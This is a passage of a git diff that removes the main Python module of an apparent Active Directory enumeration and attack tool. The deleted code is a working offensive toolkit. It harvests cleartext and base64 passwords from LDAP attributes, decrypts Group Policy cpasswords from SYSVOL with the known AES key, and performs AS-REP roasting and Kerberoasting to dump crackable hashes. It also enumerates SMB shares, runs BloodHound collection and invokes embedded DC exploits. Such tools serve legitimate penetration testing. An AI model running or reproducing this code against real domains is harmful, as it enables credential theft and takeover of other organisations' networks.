True - args.spn = True - if args.no_creds: - args.user = False - else: - userMatch = userRE.findall(args.user) - if not userMatch: - print('[ ' + colored('ERROR', 'red') +' ] User flag has to be in the form "user@domain.local"') - sys.exit(1) - - - # Boolean flow control flags - file_to_write = None - if args.out_file: - file_to_write = args.out_file - - enumAD = EnumAD(args.dc, args.secure, file_to_write, args.smb, args.bloodhound, args.kerberos_preauth, args.spn, args.sysvol, args.user) - - # Just print a blank line for output sake - print('') diff --git a/ade/__init__.py b/ade/__init__.py index 8ddf6ac..e69de29 100755 --- a/ade/__init__.py +++ b/ade/__init__.py @@ -1,832 +0,0 @@ -#!/usr/bin/env python3 -from ldap3 import Server, Connection, ALL, ALL_ATTRIBUTES, LEVEL, SUBTREE, ALL_OPERATIONAL_ATTRIBUTES -from progressbar import Bar, Percentage, ProgressBar, ETA -from ldap3.core.exceptions import LDAPKeyError, LDAPBindError, LDAPSocketOpenError -from impacket.smbconnection import SessionError -from impacket.nmb import NetBIOSTimeout, NetBIOSError -from getpass import getpass -from termcolor import colored -from impacket import smbconnection -from impacket.dcerpc.v5 import srvs -import contextlib, argparse, sys, socket, json, re, os, base64 -from Cryptodome.Cipher import AES -from dns.resolver import NXDOMAIN -import textwrap - -# Thanks SecureAuthCorp for GetNPUsers.py -# For Kerberos preauthentication -from impacket.krb5 import constants -from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter -from impacket.krb5.kerberosv5 import sendReceive, KerberosError -from impacket.krb5.types import KerberosTime, Principal -from pyasn1.codec.der import decoder, encoder -from pyasn1.type.univ import noValue -from binascii import hexlify -import datetime -import random -from .modEnumerator.modEnumerator import ModEnumerator -from .connectors.connectors import Connectors - -# Thanks SecureAuthCorp for GetUserSPNs.py -# For SPN enum -from impacket.krb5.ccache import CCache -from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS -from impacket.ntlm import compute_lmhash, compute_nthash -from impacket.krb5.asn1 import TGS_REP - -from bloodhound import BloodHound, resolve_collection_methods -from bloodhound.ad.domain import AD -from bloodhound.ad.authentication import ADAuthentication - - -class EnumAD(): - - def __init__(self, domainController, ldaps, output, enumsmb, bhout, kpre, spnEnum, searchSysvol, dryrun, domuser=None): - self.server = domainController - self.domuser = domuser - self.ldaps = ldaps - self.output = output - self.bhout = bhout - self.kpre = kpre - self.spnEnum = spnEnum - self.enumsmb = enumsmb - self.searchSysvol = searchSysvol - - self.ou_structure = domainController.split('.') - self.dc_string='' - for element in self.ou_structure: - self.dc_string += 'dc={},'.format(element) - - # LDAP properties - # At the moment we just want everything - self.ldapProps = ["*"] - - # Initialize modules - self.connectors = Connectors() - self.enumerator = ModEnumerator() - - - # Setting lists containing elements we want from the domain controller - self.computers = [] - self.people = [] - self.groups = [] - self.spn = [] - self.acl = [] - self.gpo = [] - self.domains = [] - self.ous = [] - self.deletedUsers = [] - self.passwd = False - self.passwords = {} - # Holds the values of servers that has been fingerprinted to a particular service - self.namedServers = {} - - # TODO: Figure a good way to go through the code dryrun - if dryrun: - print(self.server, self.domuser, self.ldaps, self.output, self.bhout, self.kpre, self.spnEnum, self.enumsmb, self.searchSysvol, self.ou_structure, self.dc_string) - return - - if domuser is not False: - self.runWithCreds() - else: - self.runWithoutCreds() - - self.enumDeleted() - self.enumerate_names() - self.checkForPW() - self.checkOS() - self.write_file() - - # Unbind the connection to release the handle - self.conn.unbind() - - - def runWithCreds(self): - self.CREDS = True - if not self.passwd: - self.passwd = str(getpass()) - self.bind() - self.search() - - if self.output: - self.write_file() - - if self.searchSysvol: - self.checkSYSVOL() - - if self.bhout: - self.outputToBloodhoundJson() - - if self.kpre: - self.enumKerbPre() - - if self.spnEnum: - self.enumSPNUsers() - - if self.enumsmb: - # Setting variables for further testing and analysis - self.smbShareCandidates = [] - self.smbBrowseable = {} - self.sortComputers() - self.enumSMB() - - # Lets clear variable now - self.passwd = None - - return - - - def runWithoutCreds(self): - self.CREDS = False - print('[ ' + colored('INFO', 'green') + ' ] Attempting to get objects without credentials') - self.passwd = '' - self.domuser = '' - print('') - - self.bind() - self.search() - - self.enumForCreds(self.people) - - return - - @contextlib.contextmanager - def suppressOutput(self): - with open(os.devnull, 'w') as devnull: - with contextlib.redirect_stderr(devnull) as err, contextlib.redirect_stdout(devnull) as out: - yield (err, out) - - - def enumDeleted(self): - if len(self.deletedUsers) > 0: - print('[ ' + colored('INFO', 'green') +' ] Searching for juicy info in deleted users') - self.enumForCreds(self.deletedUsers) - - - def testExploits(self): - from .exploits import exploits - print('[ ' + colored('INFO', 'green') +' ] Attempting to run imbedded exploits...') - exp = exploits.Exploits() - exp.run(self.server, self.computers[0]["name"]) - - if len(exp.vulnerable) > 0: - cves = "" - for exploit in exp.vulnerable: - cves += f"{exploit}, " - print('[ ' + colored('WARN', 'yellow') + f' ] DC may be vulnerable to: [ ' + colored(cves[:-2], 'green') + ' ]') - else: - print('[ ' + colored('OK', 'green') + ' ] DC not vulnerable to included exploits') - - - def bind(self): - try: - if self.ldaps: - self.conn = self.connectors.ldap_connector(self.server, True, self.domuser, self.passwd) - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAPS server: {0}'.format(self.server)) - else: - self.conn = self.connectors.ldap_connector(self.server, False, self.domuser, self.passwd) - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAP server: {0}'.format(self.server)) - # TODO: Catch individual exceptions instead - except (LDAPBindError, LDAPSocketOpenError): - if self.ldaps: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.server)) - else: - print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.server)) - sys.exit(1) - - - def search(self): - # Get computer objects - self.conn.search(self.dc_string[:-1], '(&(sAMAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.computers.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Computer objects') - - # Get person objects - self.conn.search(self.dc_string[:-1], '(objectCategory=person)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.people.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Person objects') - - # Get group objects - self.conn.search(self.dc_string[:-1], '(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913)(primarygroupid=*))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.groups.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Group objects') - - # Get SPN objects - self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(serviceprincipalname=*))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.spn.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all SPN objects') - - # Get ACL objects - self.conn.search(self.dc_string[:-1], '(|(samAccountType=805306368)(samAccountType=805306369)(samAccountType=268435456)(samAccountType=268435457)(samAccountType=536870912)(samAccountType=536870913)(objectClass=domain)(&(objectcategory=groupPolicyContainer)(flags=*))(objectcategory=organizationalUnit))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.acl.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all ACL objects') - - # Get GPO objects - self.conn.search(self.dc_string[:-1], '(|(&(&(objectcategory=groupPolicyContainer)(flags=*))(name=*)(gpcfilesyspath=*))(objectcategory=organizationalUnit)(objectClass=domain))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.gpo.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all GPO objects') - - # Get Domain - self.conn.search(self.dc_string[:-1], '(objectclass=domain)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.domains.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all Domains') - - # Get OUs - self.conn.search(self.dc_string[:-1], '(objectclass=organizationalUnit)', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - self.ous.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all OUs') - - # Get deleted users - self.conn.search(self.dc_string[:-1], '(objectclass=user)', attributes=self.ldapProps, search_scope=SUBTREE, controls=[('1.2.840.113556.1.4.417', True, None)]) - for entry in self.conn.entries: - self.deletedUsers.append(entry) - print('[ ' + colored('OK', 'green') +' ] Got all deleted users') - if len(self.deletedUsers) > 0: - print('[ ' + colored('INFO', 'green') +' ] Searching for juicy info in deleted users') - self.enumForCreds(self.deletedUsers) - - - def enumerate_names(self): - self.namedServers = self.enumerator.enumerate_server_names(self.computers) - - - ''' - Since it sometimes is real that the property 'userPassword:' is set - we test for it and dump the passwords - ''' - def checkForPW(self): - passwords = self.enumerator.enumerate_for_cleartext_passwords(self.people, self.server) - self.passwords = { **passwords, **self.passwords } - - if len(self.passwords.keys()) > 0: - with open(f'{self.output}-clearpw', 'w') as f: - json.dump(self.passwords, f, sort_keys=False) - - if len(self.passwords.keys()) == 1: - print('[ ' + colored('WARN', 'yellow') +' ] Found {0} clear text password'.format(len(self.passwords.keys()))) - elif len(self.passwords.keys()) == 0: - print('[ ' + colored('OK', 'green') +' ] Found {0} clear text password'.format(len(self.passwords.keys()))) - else: - print('[ ' + colored('OK', 'green') +' ] Found {0} clear text passwords'.format(len(self.passwords.keys()))) - - - ''' - While it is not unusual to find EOL servers hidden or forgotten these - often makes easier targets for lateral movemen, and because of that - we'll dump the lowest registered OS and the respective hosts for easier - enumeration afterwards - ''' - def checkOS(self): - os_json = self.enumerator.enumerate_os_version(self.computers) - - for key, value in os_json.items(): - if len(value) == 0: - continue - with open(f'{self.output}-oldest-OS', 'w') as f: - for item in value: - f.write('{0}: {1}\n'.format(key, item)) - break - - print('[ ' + colored('OK', 'green') + f' ] Wrote hosts with oldest OS to {self.output}-oldest-OS') - - - def checkSYSVOL(self): - print('[ .. ] Searching SYSVOL for cpasswords\r') - cpasswords = {} - try: - smbconn = self.connectors.smb_connector(self.server, self.domuser, self.passwd) - dirs = smbconn.listShares() - for share in dirs: - if str(share['shi1_netname']).rstrip('\0').lower() == 'sysvol': - path = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') - paths = [e.get_shortname() for e in path if len(e.get_shortname()) > 2] - for dirname in paths: - try: - # Dont want . or .. - subPath = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), str(dirname) + '\\*') - for sub in subPath: - if len(sub.get_shortname()) > 2: - paths.append(dirname + '\\' + sub.get_shortname()) - except (SessionError, UnicodeEncodeError, NetBIOSError) as e: - continue - - # Compile regexes for username and passwords - cpassRE = re.compile(r'cpassword=\"([a-zA-Z0-9/]+)\"') - unameRE = re.compile(r'userName|runAs=\"([ a-zA-Z0-9/\(\)-]+)\"') - - # Prepare the ciphers based on MSDN article with key and IV - cipher = AES.new(bytes.fromhex('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'), AES.MODE_CBC, bytes.fromhex('00' * 16)) - - # Since the first entry is the DC we dont want that - for item in paths[1:]: - if '.xml' in item.split('\\')[-1]: - with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'wb') as f: - smbconn.getFile(str(share['shi1_netname']).rstrip('\0'), item, f.write) - with open('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1]), 'r') as f: - try: - fileContent = f.read() - passwdMatch = cpassRE.findall(str(fileContent)) - for passwd in passwdMatch: - unameMatch = unameRE.findall(str(fileContent)) - for usr in unameMatch: - padding = '=' * (4 - len(passwd) % 4) - # For some reason, trailing nul bytes were on each character, so we remove any if they are there - cpasswords[usr] = cipher.decrypt(base64.b64decode(bytes(passwd + padding, 'utf-8'))).strip().decode('utf-8').replace('\x00', '') - except (UnicodeDecodeError, AttributeError) as e: - # Remove the files we had to write during the search - os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) - continue - - # Remove the files we had to write during the search - os.unlink('{0}-{1}'.format(item.split('\\')[-2], item.split('\\')[-1])) - - if len(cpasswords.keys()) > 0: - with open('{0}-cpasswords.json'.format(self.server), 'w') as f: - json.dump(cpasswords, f) - - if len(cpasswords.keys()) == 1: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpassword in a GPO on SYSVOL share'.format(len(cpasswords.keys()))) - else: - print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpasswords in GPOs on SYSVOL share'.format(len(cpasswords.keys()))) - - - except (SessionError, UnicodeEncodeError, NetBIOSError): - print('[ ' + colored('ERROR', 'red') + ' ] Some error occoured while searching SYSVOL') - else: - smbconn.close() - - - def splitJsonArr(self, arr): - if isinstance(arr, list): - if len(arr) == 1: - return arr[0] - return arr - - - def outputToBloodhoundJson(self): - print('[ ' + colored('OK', 'green') +' ] Generating BloodHound output - this may take time...') - try: - with self.suppressOutput(): - opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server) - auth = ADAuthentication(username=self.domuser, password=self.passwd, domain=self.server) - try: - ad = AD(auth=auth, domain=self.server, nameserver=None, dns_tcp=False) - ad.dns_resolve(kerberos=False, domain=self.server, options=opts) - except (NXDOMAIN) as e: - # So we didnt succeed with DNS lookup. Most likely an internal, so lets try to point to the DC - print('[ ' + colored('WARN', 'yellow') +' ] DNS lookup of Domain Controller failed - attempting to set the DC as Nameserver') - try: - ns = socket.gethostbyname(self.server) - opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server, nameserver=ns) - ad = AD(auth=auth, domain=self.server, nameserver=ns, dns_tcp=False) - ad.dns_resolve(kerberos=False, domain=self.server, options=opts) - except (NXDOMAIN) as e: - # I'm all out of luck - print('[ ' + colored('ERROR', 'red') +' ] DNS lookup of Domain Controller failed with DC as nameserver') - exit(1) - with self.suppressOutput(): - bloodhound = BloodHound(ad) - bloodhound.connect() - collection = resolve_collection_methods('Session,Trusts,ACL,DCOM,RDP,PSRemote') - bloodhound.run(collect=collection, num_workers=40, disable_pooling=False) - print('[ ' + colored('OK', 'green') +' ] BloodHound output generated') - except Exception as e: - print('[ ' + colored('ERROR', 'red') + f' ] Generating BloodHound output failed: {e}') - - - def sortComputers(self): - for computer in self.computers: - try: - self.smbShareCandidates.append(computer['dNSHostName']) - except LDAPKeyError: - # No dnsname registered - continue - if len(self.smbShareCandidates) == 1: - print('[ ' + colored('OK', 'green') +' ] Found {0} dnsname'.format(len(self.smbShareCandidates))) - else: - print('[ ' + colored('OK', 'green') +' ] Found {0} dnsnames'.format(len(self.smbShareCandidates))) - - - def enumSMB(self): - progBar = ProgressBar(widgets=['SMBConnection test: ', Percentage(), Bar(), ETA()], maxval=len(self.smbShareCandidates)).start() - prog = 0 - try: - for dnsname in self.smbShareCandidates: - try: - # Changing default timeout as shares should respond withing 5 seconds if there is a share - # and ACLs make it available to self.user with self.passwd - smbconn = self.connectors.smb_connector(self.server, self.domuser, self.passwd) - dirs = smbconn.listShares() - self.smbBrowseable[str(dnsname)] = {} - for share in dirs: - self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = '' - try: - _ = smbconn.listPath(str(share['shi1_netname']).rstrip('\0'), '*') - self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = True - except (SessionError, UnicodeEncodeError, NetBIOSError): - # Didnt have permission, all good - # Im second guessing the below adding to the JSON file as we're only interested in the listable directories really - #self.smbBrowseable[str(dnsname)][str(share['shi1_netname']).rstrip('\0')] = False - continue - smbconn.logoff() - progBar.update(prog + 1) - prog += 1 - except (socket.error, NetBIOSTimeout, SessionError, NetBIOSError): - # TODO: Examine why we sometimes get: - # impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_NOT_AVAILABLE - # on healthy shares. It seems to be reported with CIF shares - progBar.update(prog + 1) - prog += 1 - continue - except ValueError: - # We reached end of progressbar, continue since we finish below - pass - progBar.finish() - print('') - - availDirs = [] - for key, value in self.smbBrowseable.items(): - for _, v in value.items(): - if v: - availDirs.append(key) - - if len(self.smbShareCandidates) == 1: - print('[ ' + colored('OK', 'green') + ' ] Searched {0} share and {1} share with {2} subdirectories/files is browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser)) - else: - print('[ ' + colored('OK', 'green') + ' ] Searched {0} shares and {1} shares with {2} subdirectories/file sare browseable by {3}'.format(len(self.smbShareCandidates), len(self.smbBrowseable.keys()), len(availDirs), self.domuser)) - if len(self.smbBrowseable.keys()) > 0: - with open('{0}-open-smb.json'.format(self.server), 'w') as f: - json.dump(self.smbBrowseable, f, indent=4, sort_keys=False) - print('[ ' + colored('OK', 'green') + ' ] Wrote browseable shares to {0}-open-smb.json'.format(self.server)) - - - - def write_file(self): - with open(str(self.output) + '-computers', 'w') as f: - for item in self.computers: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-people', 'w') as f: - for item in self.people: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-groups', 'w') as f: - for item in self.groups: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-spn', 'w') as f: - for item in self.spn: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-acl', 'w') as f: - for item in self.acl: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-gpo', 'w') as f: - for item in self.gpo: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-domains', 'w') as f: - for item in self.domains: - f.write(str(item)) - f.write("\n") - with open(str(self.output) + '-ous', 'w') as f: - for item in self.ous: - f.write(str(item)) - f.write("\n") - - print('[ ' + colored('OK', 'green') +' ] Wrote all files to {0}-obj_name'.format(self.output)) - - - def enumKerbPre(self): - # Build user array - users = [] - self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))', attributes=self.ldapProps, search_scope=SUBTREE) - for entry in self.conn.entries: - users.append(str(entry['sAMAccountName']) + '@{0}'.format(self.server)) - if len(users) == 0: - print('[ ' + colored('OK', 'green') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users))) - elif len(users) == 1: - print('[ ' + colored('OK', 'yellow') +' ] Found {0} account that does not require Kerberos preauthentication'.format(len(users))) - else: - print('[ ' + colored('OK', 'yellow') +' ] Found {0} accounts that does not require Kerberos preauthentication'.format(len(users))) - - hashes = [] - # Build request for Tickets - for usr in users: - clientName = Principal(usr, type=constants.PrincipalNameType.NT_PRINCIPAL.value) - asReq = AS_REQ() - domain = str(self.server).upper() - serverName = Principal('krbtgt/{0}'.format(domain), type=constants.PrincipalNameType.NT_PRINCIPAL.value) - pacReq = KERB_PA_PAC_REQUEST() - pacReq['include-pac'] = True - encodedPacReq = encoder.encode(pacReq) - asReq['pvno'] = 5 - asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value) - asReq['padata'] = noValue - asReq['padata'][0] = noValue - asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value) - asReq['padata'][0]['padata-value'] = encodedPacReq - - requestBody = seq_set(asReq, 'req-body') - - options = list() - options.append(constants.KDCOptions.forwardable.value) - options.append(constants.KDCOptions.renewable.value) - options.append(constants.KDCOptions.proxiable.value) - requestBody['kdc-options'] = constants.encodeFlags(options) - - seq_set(requestBody, 'sname', serverName.components_to_asn1) - seq_set(requestBody, 'cname', clientName.components_to_asn1) - - requestBody['realm'] = domain - - now = datetime.datetime.utcnow() + datetime.timedelta(days=1) - requestBody['till'] = KerberosTime.to_asn1(now) - requestBody['rtime'] = KerberosTime.to_asn1(now) - requestBody['nonce'] = random.getrandbits(31) - - supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),) - - seq_set_iter(requestBody, 'etype', supportedCiphers) - - msg = encoder.encode(asReq) - - try: - response = sendReceive(msg, domain, self.server) - except KerberosError as e: - if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value: - supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),) - seq_set_iter(requestBody, 'etype', supportedCiphers) - msg = encoder.encode(asReq) - response = sendReceive(msg, domain, self.server) - else: - print(e) - continue - - asRep = decoder.decode(response, asn1Spec=AS_REP())[0] - - hashes.append('$krb5asrep${0}@{1}:{2}${3}'.format(usr, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(), hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())) - - if len(hashes) > 0: - with open('{0}-jtr-hashes'.format(self.server), 'w') as f: - for h in hashes: - f.write(str(h) + '\n') - - print('[ ' + colored('OK', 'yellow') +' ] Wrote all hashes to {0}-jtr-hashes'.format(self.server)) - else: - print('[ ' + colored('OK', 'green') +' ] Got 0 hashes') - - - def enumSPNUsers(self): - users_spn = { - } - user_tickets = { - } - - userDomain = self.domuser.split('@')[1] - - idx = 0 - for entry in self.spn: - spns = json.loads(self.spn[idx].entry_to_json()) - users_spn[self.splitJsonArr(spns['attributes'].get('name'))] = self.splitJsonArr(spns['attributes'].get('servicePrincipalName')) - idx += 1 - - # Get TGT for the supplied user - client = Principal(self.domuser, type=constants.PrincipalNameType.NT_PRINCIPAL.value) - try: - # We need to take the domain from the user@domain since it *could* be a cross-domain user - tgt, cipher, _, newSession = getKerberosTGT(client, '', userDomain, compute_lmhash(self.passwd), compute_nthash(self.passwd), None, kdcHost=None) - - TGT = {} - TGT['KDC_REP'] = tgt - TGT['cipher'] = cipher - TGT['sessionKey'] = newSession - - for user, spn in users_spn.items(): - if isinstance(spn, list): - # We only really need one to get a ticket - spn = spn[0] - else: - try: - # Get the TGS - serverName = Principal(spn, type=constants.PrincipalNameType.NT_SRV_INST.value) - tgs, cipher, _, newSession = getKerberosTGS(serverName, userDomain, None, TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']) - # Decode the TGS - decoded = decoder.decode(tgs, asn1Spec=TGS_REP())[0] - # Get different encryption types - if decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value: - entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.rc4_hmac.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value: - entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value: - entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) - user_tickets[spn] = entry - elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value: - entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.des_cbc_md5.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) - user_tickets[spn] = entry - - except KerberosError: - # For now continue - # TODO: Maybe look deeper into issue here - continue - - if len(user_tickets.keys()) > 0: - with open('{0}-spn-tickets'.format(self.server), 'w') as f: - for key, value in user_tickets.items(): - f.write('{0}:{1}\n'.format(key, value)) - if len(user_tickets.keys()) == 1: - print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} ticket for Kerberoasting. Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) - else: - print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} tickets for Kerberoasting. Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) - else: - print('[ ' + colored('OK', 'green') +' ] Got {0} tickets for Kerberoasting'.format(len(user_tickets.keys()))) - - - except KerberosError as err: - print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1])) - - - def enumForCreds(self, ldapdump): - searchTerms = [ - 'legacy', 'pass', 'password', 'pwd', 'passcode' - ] - excludeTerms = [ - 'badPasswordTime', 'badPwdCount', 'pwdLastSet', 'legacyExchangeDN' - ] - possiblePass = {} - idx = 0 - for _ in ldapdump: - user = json.loads(ldapdump[idx].entry_to_json()) - for prop, value in user['attributes'].items(): - if any(term in prop.lower() for term in searchTerms) and not any(ex in prop for ex in excludeTerms): - try: - possiblePass[user['attributes']['userPrincipalName'][0]] = value[0] - except KeyError: - # Could be a service user instead - try: - possiblePass[user['attributes']['servicePrincipalName'][0]] = value[0] - except KeyError: - # Don't know which type - continue - - idx += 1 - if len(possiblePass) > 0: - print('[ ' + colored('INFO', 'green') +' ] Found possible password in properties') - print('[ ' + colored('INFO', 'green') +' ] Attempting to determine if it is a password') - - for user, password in possiblePass.items(): - try: - usr, passwd = self.entroPass(user, password) - except TypeError: - # None returned, just continue - continue - if not self.CREDS: - self.domuser = usr - self.passwd = passwd - self.passwords[usr] = passwd - self.runWithCreds() - return - - - def entroPass(self, user, password): - if not password: - return None - # First check if it is a clear text - dc_test_conn = Server(self.server, get_info=ALL) - test_conn = Connection(dc_test_conn, user=user, password=password) - test_conn.bind() - # Validate the login (bind) request - if int(test_conn.result['result']) != 0: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible clear text password'.format(user, password)) - else: - print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not cleartext'.format(user, password)) - else: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property'.format(user, password)) - else: - print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had cleartext password of: "{1}" in a property - continuing with these creds'.format(user, password)) - print('') - return user, password - - test_conn.unbind() - - # Attempt for base64 - # Could be base64, lets try - try: - pw = base64.b64decode(bytes(password, encoding='utf-8')).decode('utf-8') - except base64.binascii.Error: - return None - - # Attempt decoded PW - dc_test_conn = Server(self.server, get_info=ALL) - test_conn = Connection(dc_test_conn, user=user, password=pw) - test_conn.bind() - # Validate the login (bind) request - if int(test_conn.result['result']) != 0: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" with: "{1}" as possible base64 decoded password'.format(user, pw)) - else: - print('[ ' + colored('INFO', 'green') +' ] User: "{0}" with: "{1}" was not base64 encoded'.format(user, pw)) - else: - if self.CREDS: - print('[ ' + colored('INFO', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property'.format(user, pw)) - else: - print('[ ' + colored('OK', 'yellow') +' ] User: "{0}" had base64 encoded password of: "{1}" in a property - continuing with these creds'.format(user, pw)) - print('') - return user, pw - - - - -def main(args): - parser = argparse.ArgumentParser(prog='ade', formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent(''' - ___ __ _ ____ _ __ ______ - / | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______ __/ ____/___ __ ______ ___ - / /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \\ - / ___ / /__/ /_/ /| |/ / __/ /_/ / / / / __/ /__/ /_/ /_/ / / / /_/ / /___/ / / / /_/ / / / / / / - /_/ |_\___/\__/_/ |___/\___/_____/_/_/ \___/\___/\__/\____/_/ \__, /_____/_/ /_/\__,_/_/ /_/ /_/ - /____/ - - /*----------------------------------------------------------------------------------------------------------*/ - - ''')) - - parser.add_argument('--dc', type=str, help='Hostname of the Domain Controller') - parser.add_argument('-o', '--out-file', type=str, help='Name prefix of output files (default: the name of the dc)') - parser.add_argument('-u', '--user', type=str, help='Username of the domain user to query with. The username has to be domain name as `user@domain.org`') - parser.add_argument('-s', '--secure', help='Try to estalish connection through LDAPS', action='store_true') - parser.add_argument('-smb', '--smb', help='Force enumeration of SMB shares on all computer objects fetched', action='store_true') - parser.add_argument('-kp', '--kerberos_preauth', help='Attempt to gather users that does not require Kerberos preauthentication', action='store_true') - parser.add_argument('-bh', '--bloodhound', help='Output data in the format expected by BloodHound', action='store_true') - parser.add_argument('-spn', help='Attempt to get all SPNs and perform Kerberoasting', action='store_true') - parser.add_argument('-sysvol', help='Search sysvol for GPOs with cpassword and decrypt it', action='store_true') - parser.add_argument('--all', help='Run all checks', action='store_true') - parser.add_argument('--no-creds', help='Start without credentials', action='store_true') - parser.add_argument('--dry-run', help='Don\'t execute a test but run as if. Used for testing params etc.', action='store_true') - parser.add_argument('--exploit', type=str, help='Show path to PoC exploit code') - - if len(args) == 1: - parser.print_help(sys.stderr) - sys.exit(0) - - args = parser.parse_args() - - if args.exploit: - from .exploits.exploits import Exploits - exp = Exploits() - queryResult = exp.query_exploits(args.exploit) - - if queryResult: - print('Exploit for: ' + colored(args.exploit.lower(), 'green') + f' can be found at: {queryResult}') - sys.exit(0) - else: - print(f'{args.exploit.lower()} not in 